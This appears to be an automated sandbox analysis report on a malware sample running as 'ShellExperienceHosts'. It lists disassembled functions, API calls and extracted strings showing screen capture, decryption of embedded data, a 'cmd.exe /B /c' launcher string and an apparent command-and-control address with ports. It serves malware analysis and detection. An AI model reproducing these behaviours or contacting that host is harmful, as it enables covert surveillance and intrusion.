                                                                            • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 0332E30B
                                                                            • CloseHandle.KERNEL32(?), ref: 0332E35D
                                                                            • Sleep.KERNEL32(000003E8,?,?), ref: 0332E3A4
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 0332E3D0
                                                                            • CloseHandle.KERNEL32(?,?,?), ref: 0332E3D7
                                                                            • Sleep.KERNEL32(000003E8,?,?), ref: 0332E3E2
                                                                            • CloseHandle.KERNEL32(?), ref: 0332E400
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 0332E425
                                                                            • CloseHandle.KERNEL32(?,?,?), ref: 0332E42C
                                                                            • Sleep.KERNEL32(00000000,?,?,?), ref: 0332E446
                                                                            • CloseHandle.KERNEL32(?), ref: 0332E464
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleSleep$EnumObjectSingleWaitWindows$CreateEventExceptionFilterLocalOpenQueryTimeUnhandledValue__fassign_mallocwsprintf
                                                                            • String ID: %4d.%2d.%2d-%2d:%2d:%2d$118.107.44.112$118.107.44.112$118.107.44.112$118.107.44.112$18091$18091$18092$18093$Console$IpDatespecial
                                                                            • API String ID: 1511462596-3132951947
                                                                            • Opcode ID: 96e8a67fee46d46b4cec042ea945679948ced766baa178fcc34072094dd1bdf6
                                                                            • Instruction ID: 4b254f9407b8c70b082ece7ef7514fa92cdd2ce4fd14cee18fc510f96212ec74
                                                                            • Opcode Fuzzy Hash: 96e8a67fee46d46b4cec042ea945679948ced766baa178fcc34072094dd1bdf6
                                                                            • Instruction Fuzzy Hash: AED1D2B8944350AFD320EF64DCC6F2BBBECBB84B01F044A2CF55596285EB71A545CB62
                                                                            Function 0332BC70 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 351windowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 2324 332bc70-332bce3 GetDesktopWindow GetDC CreateCompatibleDC GetDC GetDeviceCaps * 2 ReleaseDC 2325 332bcf6-332bcfe GetSystemMetrics 2324->2325 2326 332bce5-332bcf1 2324->2326 2328 332bd00-332bd49 call 33401c0 GetSystemMetrics call 33401c0 2325->2328 2329 332bd4b-332bd69 call 33401c0 GetSystemMetrics call 33401c0 2325->2329 2327 332bd76-332beff GetSystemMetrics call 33401c0 GetSystemMetrics call 33401c0 CreateCompatibleBitmap SelectObject SetStretchBltMode GetSystemMetrics call 33401c0 GetSystemMetrics call 33401c0 StretchBlt call 332eff4 call 3336770 GetDIBits call 332eff4 call 3336770 call 3337660 call 332f707 2326->2327 2358 332bf10-332bf1d call 332c060 2327->2358 2359 332bf01-332bf0e 2327->2359 2340 332bd6e-332bd73 2328->2340 2329->2340 2340->2327 2362 332bf99-332bfc3 call 332eff4 2358->2362 2363 332bf1f-332bf4a DeleteObject * 2 ReleaseDC call 332fac9 2358->2363 2359->2358 2368 332bfc5-332bfc7 2362->2368 2369 332bfc9 2362->2369 2370 332bf55-332bf57 2363->2370 2371 332bf4c-332bf52 call 332fac9 2363->2371 2373 332bfcb-332c006 call 3337660 DeleteObject * 2 ReleaseDC call 332fac9 2368->2373 2369->2373 2374 332bf84-332bf96 call 332f00a 2370->2374 2375 332bf59-332bf5d 2370->2375 2371->2370 2389 332c011-332c015 2373->2389 2390 332c008-332c009 call 332fac9 2373->2390 2378 332bf6a-332bf81 call 332efff 2375->2378 2379 332bf5f-332bf67 call 332efff 2375->2379 2378->2374 2379->2378 2391 332c022-332c04f call 332efff call 332f00a 2389->2391 2392 332c017-332c01f call 332efff 2389->2392 2396 332c00e 2390->2396 2392->2391 2396->2389
                                                                            APIs
                                                                            • GetDesktopWindow.USER32 ref: 0332BC8F
                                                                            • GetDC.USER32(00000000), ref: 0332BC9C
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0332BCA2
                                                                            • GetDC.USER32(00000000), ref: 0332BCAD
                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 0332BCBA
                                                                            • GetDeviceCaps.GDI32(00000000,00000076), ref: 0332BCC2
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0332BCD3
                                                                            • GetSystemMetrics.USER32(0000004E), ref: 0332BCF8
                                                                            • GetSystemMetrics.USER32(0000004F), ref: 0332BD26
                                                                            • GetSystemMetrics.USER32(0000004C), ref: 0332BD78
                                                                            • GetSystemMetrics.USER32(0000004D), ref: 0332BD8D
                                                                            • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 0332BDA6
                                                                            • SelectObject.GDI32(?,00000000), ref: 0332BDB4
                                                                            • SetStretchBltMode.GDI32(?,00000003), ref: 0332BDC0
                                                                            • GetSystemMetrics.USER32(0000004F), ref: 0332BDCD
                                                                            • GetSystemMetrics.USER32(0000004E), ref: 0332BDE0
                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,?,?,00000000,?,00000000), ref: 0332BE07
                                                                            • _memset.LIBCMT ref: 0332BE7A
                                                                            • GetDIBits.GDI32(?,?,00000000,00000000,?,00000028,00000000), ref: 0332BE97
                                                                            • _memset.LIBCMT ref: 0332BEAF
                                                                              • Part of subcall function 0332F707: _malloc.LIBCMT ref: 0332F721
                                                                            • DeleteObject.GDI32(?), ref: 0332BF23
                                                                            • DeleteObject.GDI32(?), ref: 0332BF2D
                                                                            • ReleaseDC.USER32(00000000,?), ref: 0332BF39
                                                                            • DeleteObject.GDI32(?), ref: 0332BFDF
                                                                            • DeleteObject.GDI32(?), ref: 0332BFE9
                                                                            • ReleaseDC.USER32(00000000,?), ref: 0332BFF5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: MetricsSystem$Object$Delete$Release$CapsCompatibleCreateDeviceStretch_memset$BitmapBitsDesktopModeSelectWindow_malloc
                                                                            • String ID: ($6$gfff$gfff
                                                                            • API String ID: 3293817703-713438465
                                                                            • Opcode ID: eea88a5ae3c8f89b53c40565887c7162011cd3168fc7c050fd3feef44e47f511
                                                                            • Instruction ID: 66d4692910d70f1c1a0a1f3a4dfe1b3e835d55871179f57a2050a8c0e5d5662a
                                                                            • Opcode Fuzzy Hash: eea88a5ae3c8f89b53c40565887c7162011cd3168fc7c050fd3feef44e47f511
                                                                            • Instruction Fuzzy Hash: 97D179B5E01318AFDB14EFE9E885A9EFBB9FF48300F144529F505AB240DB74A901CB91
                                                                            Function 6C6B8792 Relevance: 40.8, APIs: 22, Strings: 1, Instructions: 539encryptionCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 2462 6c6b8792-6c6b879b 2463 6c6b87db-6c6b87de 2462->2463 2464 6c6b879d-6c6b87a7 2462->2464 2465 6c6b87a9-6c6b87c0 2464->2465 2466 6c6b87c7-6c6b87d8 call 6c6e116e 2464->2466 2467 6c6b87df-6c6b8849 call 6c85c237 CryptAcquireContextW 2465->2467 2468 6c6b87c2-6c6b87c5 2465->2468 2466->2463 2473 6c6b884f-6c6b887c 2467->2473 2474 6c6b8dac-6c6b8df2 call 6c84cc23 call 6c84c646 2467->2474 2468->2466 2476 6c6b887e-6c6b8893 2473->2476 2490 6c6b8df5-6c6b8e10 call 6c6b8792 * 2 2474->2490 2478 6c6b8abb-6c6b8af1 CryptReleaseContext call 6c6b9f40 * 2 2476->2478 2479 6c6b8899-6c6b88ad CryptCreateHash 2476->2479 2503 6c6b8b29-6c6b8b2e 2478->2503 2504 6c6b8af3-6c6b8b07 2478->2504 2482 6c6b88b3-6c6b88b8 2479->2482 2483 6c6b8ce4-6c6b8d3b CryptReleaseContext call 6c84cc23 call 6c84c646 2479->2483 2487 6c6b88ba-6c6b88cb CryptHashData 2482->2487 2488 6c6b88d1-6c6b88d7 2482->2488 2483->2490 2487->2488 2494 6c6b8d40-6c6b8da0 CryptDestroyHash CryptReleaseContext call 6c84cc23 call 6c84c646 2487->2494 2492 6c6b88d9-6c6b88dc 2488->2492 2493 6c6b88e3-6c6b88e9 2488->2493 2492->2493 2499 6c6b88eb 2493->2499 2500 6c6b88ed-6c6b890c call 6c6b9a02 2493->2500 2494->2490 2499->2500 2523 6c6b890e-6c6b8918 call 6c6b9bda 2500->2523 2524 6c6b891d-6c6b8934 CryptHashData 2500->2524 2511 6c6b8b5c-6c6b8b61 2503->2511 2512 6c6b8b30-6c6b8b3a 2503->2512 2508 6c6b8b09-6c6b8b14 2504->2508 2509 6c6b8b1f-6c6b8b26 call 6c6e116e 2504->2509 2519 6c6b8b1a-6c6b8b1d 2508->2519 2520 6c6b8da7 call 6c85c237 2508->2520 2509->2503 2516 6c6b8b8f-6c6b8b94 2511->2516 2517 6c6b8b63-6c6b8b6d 2511->2517 2514 6c6b8b3c-6c6b8b47 2512->2514 2515 6c6b8b52-6c6b8b59 call 6c6e116e 2512->2515 2514->2520 2525 6c6b8b4d-6c6b8b50 2514->2525 2515->2511 2533 6c6b8bc2-6c6b8bd5 2516->2533 2534 6c6b8b96-6c6b8ba0 2516->2534 2531 6c6b8b6f-6c6b8b7a 2517->2531 2532 6c6b8b85-6c6b8b8c call 6c6e116e 2517->2532 2519->2509 2520->2474 2523->2524 2529 6c6b893a-6c6b8962 CryptGetHashParam 2524->2529 2530 6c6b8c28-6c6b8c81 CryptDestroyHash CryptReleaseContext call 6c84cc23 call 6c84c646 2524->2530 2525->2515 2536 6c6b8968-6c6b8973 2529->2536 2537 6c6b8c86-6c6b8cdf CryptDestroyHash CryptReleaseContext call 6c84cc23 call 6c84c646 2529->2537 2530->2490 2531->2520 2539 6c6b8b80-6c6b8b83 2531->2539 2532->2516 2542 6c6b8bb8-6c6b8bbf call 6c6e116e 2534->2542 2543 6c6b8ba2-6c6b8bad 2534->2543 2545 6c6b8981 2536->2545 2546 6c6b8975-6c6b8977 2536->2546 2537->2490 2539->2532 2542->2533 2543->2520 2550 6c6b8bb3-6c6b8bb6 2543->2550 2554 6c6b8a6c-6c6b8a8b CryptGetHashParam CryptDestroyHash 2545->2554 2555 6c6b8987-6c6b898e 2545->2555 2553 6c6b897a-6c6b897c 2546->2553 2550->2542 2553->2554 2558 6c6b8a91-6c6b8ab6 call 6c6b9d9a 2554->2558 2559 6c6b8bd6-6c6b8c23 CryptReleaseContext call 6c84cc23 call 6c84c646 2554->2559 2560 6c6b89dd-6c6b89f2 call 6c84e940 2555->2560 2561 6c6b8990-6c6b8998 2555->2561 2558->2476 2559->2490 2560->2553 2566 6c6b899e-6c6b89d0 2561->2566 2567 6c6b8da2 call 6c6b99f8 2561->2567 2571 6c6b89d2-6c6b89db call 6c6b971e 2566->2571 2572 6c6b89f4-6c6b89fa call 6c6e1139 2566->2572 2567->2520 2581 6c6b89fd-6c6b8a2e call 6c84e940 call 6c84e3c0 2571->2581 2572->2581 2586 6c6b8a5c-6c6b8a69 2581->2586 2587 6c6b8a30-6c6b8a3a 2581->2587 2586->2554 2588 6c6b8a3c-6c6b8a47 2587->2588 2589 6c6b8a52-6c6b8a59 call 6c6e116e 2587->2589 2588->2520 2590 6c6b8a4d-6c6b8a50 2588->2590 2589->2586 2590->2589
                                                                            APIs
                                                                            • CryptAcquireContextW.ADVAPI32 ref: 6C6B8841
                                                                            • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 6C6B88A5
                                                                            • CryptHashData.ADVAPI32(?,?,00000000,00000000), ref: 6C6B88C3
                                                                            • CryptHashData.ADVAPI32(?,?,?,00000000,?,?,?), ref: 6C6B892C
                                                                            • CryptGetHashParam.ADVAPI32(?,00000004,?,?,00000000), ref: 6C6B8954
                                                                            • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 6C6B8A78
                                                                            • CryptDestroyHash.ADVAPI32(?), ref: 6C6B8A83
                                                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6C6B8ABE
                                                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6C6B8BDC
                                                                            • ___std_exception_copy.LIBVCRUNTIME ref: 6C6B8C00
                                                                            • CryptDestroyHash.ADVAPI32(?), ref: 6C6B8C2B
                                                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6C6B8C37
                                                                            • ___std_exception_copy.LIBVCRUNTIME ref: 6C6B8C5E
                                                                              • Part of subcall function 6C84C646: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,20000000,6C6D830C), ref: 6C84C6A7
                                                                            • ___std_exception_copy.LIBVCRUNTIME ref: 6C6B8DCF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Crypt$Hash$Context$Release___std_exception_copy$DataDestroyParam$AcquireCreateExceptionRaise
                                                                            • String ID:
                                                                            • API String ID: 3252232363-3916222277
                                                                            • Opcode ID: f1cda4a049b4ba3cd567638a66b4769d084b65be5af1653566d447ff704db5a6
                                                                            • Instruction ID: 4f92e1879728634344c65f8a71150e66aee5f5772ea1897c9b139c4e21cb3c1c
                                                                            • Opcode Fuzzy Hash: f1cda4a049b4ba3cd567638a66b4769d084b65be5af1653566d447ff704db5a6
                                                                            • Instruction Fuzzy Hash: 2812D0B2E112199FDB24CFA8CD84AEEBBB9FF49304F14862AE405E7750D7309954CB94
                                                                            Function 6C6B8E2D Relevance: 33.8, APIs: 17, Strings: 2, Instructions: 573encryptionCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 2593 6c6b8e2d-6c6b8e82 call 6c6b84fc 2596 6c6b8ed2-6c6b8f2b call 6c6b87e4 CryptAcquireContextW 2593->2596 2597 6c6b8e84-6c6b8e95 2593->2597 2603 6c6b8f31-6c6b8f6f CryptImportKey 2596->2603 2604 6c6b9357-6c6b93a0 call 6c84cc23 call 6c84c646 2596->2604 2597->2596 2598 6c6b8e97-6c6b8ed0 call 6c6b9d9a call 6c84e3c0 2597->2598 2598->2596 2606 6c6b93a5-6c6b93f3 CryptReleaseContext call 6c84cc23 call 6c84c646 2603->2606 2607 6c6b8f75-6c6b8f87 CryptSetKeyParam 2603->2607 2627 6c6b94fe-6c6b9505 call 6c6b9714 2604->2627 2606->2627 2611 6c6b93f8-6c6b9451 CryptDestroyKey CryptReleaseContext call 6c84cc23 call 6c84c646 2607->2611 2612 6c6b8f8d-6c6b8fa6 CryptSetKeyParam 2607->2612 2611->2627 2616 6c6b8fac-6c6b8fca 2612->2616 2617 6c6b9456-6c6b94af CryptDestroyKey CryptReleaseContext call 6c84cc23 call 6c84c646 2612->2617 2622 6c6b8fcc 2616->2622 2623 6c6b9023-6c6b9051 CryptDecrypt CryptDestroyKey CryptReleaseContext 2616->2623 2617->2627 2625 6c6b950a call 6c6b99f8 2622->2625 2626 6c6b8fd2-6c6b8fdb 2622->2626 2630 6c6b94b1-6c6b94fb call 6c84cc23 call 6c84c646 2623->2630 2631 6c6b9057-6c6b9065 2623->2631 2645 6c6b950f-6c6b952e call 6c6b99f8 call 6c6b8792 2625->2645 2633 6c6b8fe8-6c6b8fee call 6c6e1139 2626->2633 2634 6c6b8fdd-6c6b8fe6 call 6c6b971e 2626->2634 2627->2625 2630->2627 2640 6c6b9073 2631->2640 2641 6c6b9067-6c6b906e 2631->2641 2659 6c6b8ff1-6c6b9020 call 6c84e3c0 2633->2659 2634->2659 2646 6c6b9169-6c6b917c 2640->2646 2648 6c6b9079-6c6b9080 2640->2648 2641->2646 2646->2627 2651 6c6b9182-6c6b9185 2646->2651 2654 6c6b90d2-6c6b90e8 call 6c84e940 2648->2654 2655 6c6b9082-6c6b908a 2648->2655 2660 6c6b91a0-6c6b91c7 2651->2660 2661 6c6b9187-6c6b919e call 6c84e3c0 2651->2661 2654->2646 2655->2645 2656 6c6b9090-6c6b90be 2655->2656 2663 6c6b90ea-6c6b90f7 call 6c6e1139 2656->2663 2664 6c6b90c0-6c6b90d0 call 6c6b971e 2656->2664 2659->2623 2669 6c6b91d9-6c6b91e4 call 6c6e1139 2660->2669 2670 6c6b91c9-6c6b91d7 call 6c6b971e 2660->2670 2681 6c6b9205-6c6b920d 2661->2681 2684 6c6b90fa-6c6b9128 call 6c84e940 call 6c84e3c0 2663->2684 2664->2684 2683 6c6b91e7-6c6b9203 call 6c84e3c0 2669->2683 2670->2683 2685 6c6b923b-6c6b9240 2681->2685 2686 6c6b920f-6c6b9219 2681->2686 2683->2681 2724 6c6b912a-6c6b9134 2684->2724 2725 6c6b9156-6c6b9166 2684->2725 2691 6c6b9242-6c6b9256 2685->2691 2692 6c6b9287-6c6b928c 2685->2692 2688 6c6b921b-6c6b9226 2686->2688 2689 6c6b9231-6c6b9238 call 6c6e116e 2686->2689 2696 6c6b922c-6c6b922f 2688->2696 2697 6c6b9352 call 6c85c237 2688->2697 2689->2685 2700 6c6b9258-6c6b9263 2691->2700 2701 6c6b9276-6c6b9280 call 6c6e116e 2691->2701 2694 6c6b928e-6c6b9298 2692->2694 2695 6c6b92cc-6c6b92d1 2692->2695 2703 6c6b92bb-6c6b92c5 call 6c6e116e 2694->2703 2704 6c6b929a-6c6b92b0 2694->2704 2705 6c6b930d-6c6b9312 2695->2705 2706 6c6b92d3-6c6b92dd 2695->2706 2696->2689 2697->2604 2700->2697 2710 6c6b9269-6c6b9274 2700->2710 2701->2692 2703->2695 2704->2697 2714 6c6b92b6-6c6b92b9 2704->2714 2712 6c6b933c-6c6b9351 2705->2712 2713 6c6b9314-6c6b931e 2705->2713 2716 6c6b92df-6c6b92f5 2706->2716 2717 6c6b92fc-6c6b9306 call 6c6e116e 2706->2717 2710->2701 2719 6c6b9332-6c6b9339 call 6c6e116e 2713->2719 2720 6c6b9320-6c6b932b 2713->2720 2714->2703 2716->2697 2722 6c6b92f7-6c6b92fa 2716->2722 2717->2705 2719->2712 2720->2697 2729 6c6b932d-6c6b9330 2720->2729 2722->2717 2727 6c6b914c-6c6b9153 call 6c6e116e 2724->2727 2728 6c6b9136-6c6b9141 2724->2728 2725->2646 2727->2725 2728->2697 2731 6c6b9147-6c6b914a 2728->2731 2729->2719 2731->2727
                                                                            APIs
                                                                              • Part of subcall function 6C6B84FC: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 6C6B8545
                                                                              • Part of subcall function 6C6B84FC: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 6C6B85BD
                                                                            • CryptAcquireContextW.ADVAPI32 ref: 6C6B8F23
                                                                            • CryptImportKey.ADVAPI32(?,?,00000014,00000000,00000000,?), ref: 6C6B8F67
                                                                            • CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 6C6B8F7F
                                                                            • CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000), ref: 6C6B8F9E
                                                                            • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,?,?), ref: 6C6B9034
                                                                            • CryptDestroyKey.ADVAPI32(?,?,?), ref: 6C6B903F
                                                                            • CryptReleaseContext.ADVAPI32(?,00000000,?,?), ref: 6C6B9049
                                                                            • ___std_exception_copy.LIBVCRUNTIME ref: 6C6B937D
                                                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6C6B93A9
                                                                            • ___std_exception_copy.LIBVCRUNTIME ref: 6C6B93D0
                                                                            • CryptDestroyKey.ADVAPI32(?), ref: 6C6B93FB
                                                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6C6B9407
                                                                            • ___std_exception_copy.LIBVCRUNTIME ref: 6C6B942E
                                                                              • Part of subcall function 6C84C646: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,20000000,6C6D830C), ref: 6C84C6A7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Crypt$Context$Release___std_exception_copy$BinaryDestroyParamString$AcquireDecryptExceptionImportRaise
                                                                            • String ID: Salt$ed__
                                                                            • API String ID: 2404961614-3701620873
                                                                            • Opcode ID: 333677df537644a96709cc4b88e2730daa5264c12bd2be36ee34e0e506cdd797
                                                                            • Instruction ID: d5c5c36e4bc5b544d87b89f42309127eb397162cde4734f773fcc08c138d1dc7
                                                                            • Opcode Fuzzy Hash: 333677df537644a96709cc4b88e2730daa5264c12bd2be36ee34e0e506cdd797
                                                                            • Instruction Fuzzy Hash: D122CFB2E112189FDB24CF68CD44BEEBBB9BF59308F148629E809B7740D7319954CB94
                                                                            Function 6C6BAE95 Relevance: 32.2, APIs: 9, Strings: 9, Instructions: 690fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: _strlen$CopyFile
                                                                            • String ID: .batkup.$.battor.$.bat$.pid$Failed to create backup DLL. Please check the DLL path: $Failed to create backup EXE. Please check the EXE path: $cmd.exe /B /c "%s"$itor$tor.
                                                                            • API String ID: 2689559967-3443813646
                                                                            • Opcode ID: ec2a7928e28fe65675115c028a548e10f738d45cc0b603915ff28ff0c3369e6a
                                                                            • Instruction ID: 581b95e595250ec8e985a30642647735f39e03b19e602f49248961c66df4e6b6
                                                                            • Opcode Fuzzy Hash: ec2a7928e28fe65675115c028a548e10f738d45cc0b603915ff28ff0c3369e6a
                                                                            • Instruction Fuzzy Hash: E3529BB1900B008BD325CF38C880BA6B7E5FF89318F144A2DD4AA97B91EB71F555CB59
                                                                            Function 03326A70 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 141memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 3205 3326a70-3326ae3 call 332eff4 GetCurrentProcessId wsprintfW call 3326910 call 3336770 GetVersionExW 3212 3326be6-3326bec 3205->3212 3213 3326ae9-3326af0 3205->3213 3215 3326c14-3326c21 wsprintfW 3212->3215 3213->3212 3214 3326af6-3326afd 3213->3214 3214->3212 3216 3326b03-3326b21 GetCurrentProcess OpenProcessToken 3214->3216 3217 3326c24-3326c26 3215->3217 3216->3212 3218 3326b27-3326b47 GetTokenInformation 3216->3218 3219 3326c31-3326c46 call 332f00a 3217->3219 3220 3326c28-3326c2e call 332fac9 3217->3220 3221 3326bbb-3326bce CloseHandle 3218->3221 3222 3326b49-3326b52 GetLastError 3218->3222 3220->3219 3228 3326bd0 3221->3228 3229 3326bf6-3326bfc 3221->3229 3222->3221 3225 3326b54-3326b6b LocalAlloc 3222->3225 3225->3221 3232 3326b6d-3326b8d GetTokenInformation 3225->3232 3233 3326bd2-3326bd4 3228->3233 3234 3326bee-3326bf4 3228->3234 3230 3326c0e-3326c0f 3229->3230 3231 3326bfe-3326c04 3229->3231 3230->3215 3231->3217 3235 3326c06-3326c0c 3231->3235 3236 3326bae-3326bb5 LocalFree 3232->3236 3237 3326b8f-3326bac GetSidSubAuthorityCount GetSidSubAuthority 3232->3237 3233->3212 3238 3326bd6-3326bdc 3233->3238 3234->3215 3235->3215 3236->3221 3237->3236 3238->3217 3239 3326bde-3326be4 3238->3239 3239->3215
                                                                            APIs
                                                                            • GetCurrentProcessId.KERNEL32(75BF73E0), ref: 03326A94
                                                                            • wsprintfW.USER32 ref: 03326AA7
                                                                              • Part of subcall function 03326910: GetCurrentProcessId.KERNEL32(18F775C8,00000000,00000000,75BF73E0,?,00000000,033410DB,000000FF,?,03326AB3,00000000), ref: 03326938
                                                                              • Part of subcall function 03326910: OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,033410DB,000000FF,?,03326AB3,00000000), ref: 03326947
                                                                              • Part of subcall function 03326910: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,033410DB,000000FF,?,03326AB3,00000000), ref: 03326960
                                                                              • Part of subcall function 03326910: CloseHandle.KERNEL32(00000000,?,00000000,033410DB,000000FF,?,03326AB3,00000000), ref: 0332696B
                                                                            • _memset.LIBCMT ref: 03326AC2
                                                                            • GetVersionExW.KERNEL32(?), ref: 03326ADB
                                                                            • GetCurrentProcess.KERNEL32(00000008,?), ref: 03326B12
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 03326B19
                                                                            • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 03326B3F
                                                                            • GetLastError.KERNEL32 ref: 03326B49
                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 03326B5D
                                                                            • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 03326B85
                                                                            • GetSidSubAuthorityCount.ADVAPI32 ref: 03326B98
                                                                            • GetSidSubAuthority.ADVAPI32(00000000), ref: 03326BA6
                                                                            • LocalFree.KERNEL32(?), ref: 03326BB5
                                                                            • CloseHandle.KERNEL32(?), ref: 03326BC2
                                                                            • wsprintfW.USER32 ref: 03326C1B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Process$Token$CurrentOpen$AuthorityCloseHandleInformationLocalwsprintf$AllocCountErrorFreeLastVersion_memset
